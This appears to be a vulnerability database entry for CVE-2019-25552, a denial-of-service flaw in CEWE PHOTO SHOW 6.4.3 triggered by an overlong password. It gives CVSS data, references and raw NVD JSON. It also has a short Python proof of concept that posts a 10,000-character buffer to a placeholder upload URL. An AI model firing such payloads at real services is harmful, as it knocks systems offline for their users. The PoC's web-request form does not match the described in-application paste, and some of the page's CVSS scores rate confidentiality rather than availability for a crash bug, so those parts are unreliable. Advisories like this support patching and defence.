CVE-2019-25552

Description

CEWE PHOTO SHOW 6.4.3 contains a denial of service vulnerability that allows attackers to crash the application by submitting an excessively long buffer to the password field. Attackers can paste a large string of repeated characters into the password input during the upload process to trigger an application crash.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:cewe:photo_show:6.4.3:*:*:*:*:*:*:* - VULNERABLE

CEWE PHOTO SHOW 6.4.3

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL (Replace with actual upload endpoint)
target_url = "http://<target-ip>/upload"

# Generate a large buffer to trigger the crash
# Attackers paste a large string of repeated characters
payload = "A" * 10000

# Prepare the data with the malicious password field
data = {
    "username": "test",
    "password": payload
}

try:
    # Send the POST request to trigger the vulnerability
    response = requests.post(target_url, data=data, timeout=5)
    print(f"Request sent with status code: {response.status_code}")
except requests.exceptions.RequestException as e:
    print(f"The application may have crashed or connection refused: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2019-25552
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2019-25552
[3] CVE Details https://www.cvedetails.com/cve/CVE-2019-25552/
[4] VulDB https://vuldb.com/cve/CVE-2019-25552
[5] https://cewe-photoworld.com/
[6] https://www.exploit-db.com/exploits/46861
[7] https://www.vulncheck.com/advisories/cewe-photo-show-denial-of-service-via-password-field

Raw JSON Data

JSON

{"cve": {"id": "CVE-2019-25552", "sourceIdentifier": "[email protected]", "published": "2026-03-21T13:16:17.507", "lastModified": "2026-04-10T01:20:49.400", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "CEWE PHOTO SHOW 6.4.3 contains a denial of service vulnerability that allows attackers to crash the application by submitting an excessively long buffer to the password field. Attackers can paste a large string of repeated characters into the password input during the upload process to trigger an application crash."}, {"lang": "es", "value": "CEWE PHOTO SHOW 6.4.3 contiene una vulnerabilidad de denegación de servicio que permite a los atacantes bloquear la aplicación al enviar un búfer excesivamente largo al campo de contraseña. Los atacantes pueden pegar una cadena larga de caracteres repetidos en la entrada de contraseña durante el proceso de carga para provocar un bloqueo de la aplicación."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-836"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:cewe:photo_show:6.4.3:*:*:*:*:*:*:*", "matchCriteriaId": "9DF9234C-8F74-4815-A17E-4A711B213FE4"}]}]}], "references": [{"url": "https://cewe-photoworld.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.exploit-db.com/exploits/46861", "source": "[email protected]", "tags": ["Exploit", "VDB Entry"]}, {"url": "https://www.vulncheck.com/advisories/cewe-photo-show-denial-of-service-via-password-field", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}